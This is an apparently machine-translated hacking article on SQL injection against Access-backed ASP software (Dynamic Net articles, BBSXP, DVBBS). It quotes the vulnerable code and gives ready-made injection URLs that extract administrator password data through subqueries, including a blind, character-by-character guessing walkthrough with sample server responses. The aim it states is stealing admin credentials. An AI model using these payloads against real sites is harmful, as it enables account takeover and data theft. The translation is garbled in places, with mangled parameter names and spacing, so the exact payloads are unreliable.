SQL Injection with Access

Author: PsKey (PsKey) Source: gray track

 

PsKey (PsKey@hotmail.com)
Www.isgrey.com

>>> Dedicated This Scrap To CaoJing <

Many users complain that the ACCESS function is too weak and there is no annotator. Multi-statement queries are not supported... on the other hand, when many programmers use ACCESS for database writing programs, they usually only perform strict review on the operation code of sensitive tables, while the operation code of other tables is very rough. This can only be said that we know too little about ACCESS. Not long ago, I was lucky to see a special ACCESS site. Its forum has divided many sections, and it turned out to be related to ACCESS; I have learned a lot here. I just want to understand it. The younger brother is stupid and cannot write an overview article. I 'd like to explain some problems to you through several examples:

I. dynamic network articles

Involved versions:
^
All versions of dynamic network articles

Description:
^
Dynamic net is a WWW. ASPSKY. NET Development and Maintenance of open source code article management system, widely used in China; because of its list. the asp file does not filter the Input submitted by the user for SQL query. As a result, remote attackers can exploit this vulnerability to launch SQL injection attacks.

Details:
^
Related code in listing. asp:
15 SQL = "select Aclass. class, ANclass. nclass, article. title, article. classid, article. nclassid from article, Aclass, ANclass where article. classid = Aclass. classid and article. nclassid = ANclass. nclassid and article. articleID = "& request (" id ")

The id is directly stored in the SQL query without any check. This is easy to see, but when it comes to exploitation, some friends are hard: The table corresponding to this statement is article, but the management password is in the admin table, and ACCESS cannot execute multi-statement queries. What is the purpose of this bug? Well, we can't use subqueries. There are many methods:

Http://www.target.com/asp/darticle/list.asp? Id = (select id from admin where flag = 1)

Http://www.target.com/asp/darticle/list.asp? Id = (select min (id) from admin where flag = 1)

Http://www.target.com/asp/darticle/list.asp? Id = 1 and exists (select id from admin where flag = 1)

Http://www.target.com/asp/darticle/list.asp? Id = 1 and article. articleID in (select top 1 id from admin where len (password)> 1 order by id)
And so on...

How can I get the administrator password :)

Ii. BBSXP

Involved versions:
^
All BBSXP versions

Description:
^
BBSXP is a WWW. BBSXP. open source code Asp Forum developed and maintained by COM. Due to the simplicity of the security protection measures adopted by the author, the SQL Injection vulnerability exists in multiple files in the Forum, illegal users can quickly crack arbitrary user passwords or conduct other malicious attacks.

Details:
^
Not long ago I wrote an article about the BBSXP vulnerability. The author simply upgraded the Forum, but still did not completely solve the SQL Injection problem, for example:
Bank. asp
-------------------------------------------------------------------------------
152 SQL = "select * from user where username =" & request ("dxname ")&""
153 rs1.Open SQL, Conn
154 if rs1.eof then
155 message = message & "<li> the account of this person is not found! "
156 end if
-------------------------------------------------------------------------------
Well, it's okay to use all the user passwords in the user table, but some people start to whisper: The BBSXP background management password is different from the Forum front-end password. What should I do?
The background password is stored in the clubconfig table. It is still used in the same way as above. Use subqueries.
Here is an example:
Searchok. asp
-------------------------------------------------------------------------------
Forumid = Request ("forumid ")
...
21 if Request ("forumid") <> "" then
22 forumidor = "forumid =" & forumid & "and"
End if
...
SQL = "select * from forum where deltopic <> 1 and" & forumidor & "" & item & "& TimeLimit &" order by lasttime Desc"
...
-------------------------------------------------------------------------------
Submit a URL similar to the following (it is best to write a small code to send this request ):
Http://www.target.com/bbsxp165/bbsxp/searchok.asp? Search = author & searchxm = username & forumid = (select % 20 count (administrators) % 20 from % 20 clubconfig % 20 where % 20len (adminpassword)> 1)
Look, didn't we start to query the clubconfig table?

Iii. severe vulnerabilities in the dynamic network forum (DVBBS) (Supplement)
After I published this vulnerability, many of my friends wrote to me and asked me how to crack MD5 (is it necessary to crack it ?) Some want to test the Code, some want to make an animation... some also say that the background management password is different from the Forum front-end password. How can we get the background password? I guess these friends don't think much about themselves. Is it really nice to think about it?
I will add how to use the MD5 encryption management password in the background:

Http://www.target.com/dv/tongji.asp? Oracle = 2 & n = 2% 20 (select % 20max (id) % 20 from % 20 admin ),
Return Value:
-------------------------------------------------------------------------------
Document. write (□); document. write (9); document. write (
); Document. write (□); document. write (9); document. write (
);
-------------------------------------------------------------------------------

Http://www.target.com/dv/tongji.asp? Orders = 2 & n = 2% 20 (select % 20max (id) % 20 from % 20 admin % 20 where % 20 left (password, 1) = ),
Return Value:
-------------------------------------------------------------------------------
Document. write (□); document. write (); document. write (
); Document. write (□); document. write (); document. write (
);
-------------------------------------------------------------------------------
Ah, it's blank. We guessed it wrong. Come back:

Http://www.target.com/dv/tongji.asp? Orders = 2 & n = 2% 20 (select % 20max (id) % 20 from % 20 admin % 20 where % 20 left (password, 1) = d ),
Return Value:
-------------------------------------------------------------------------------
Document. write (□); document. write (9); document. write (
); Document. write (□); document. write (9); document. write (
);
-------------------------------------------------------------------------------
Haha, that's right.
Next, let's continue. Of course, you can make a slight modification to the small program I wrote before using it here!

But I want to remind you that the DVBBS background file management is cookie + session dual authentication!

Note: I randomly dropped some programs from the original code download site, including forums, message books, and Article download management. I found similar problems. In fact, as long as we are cautious, the problem will not occur!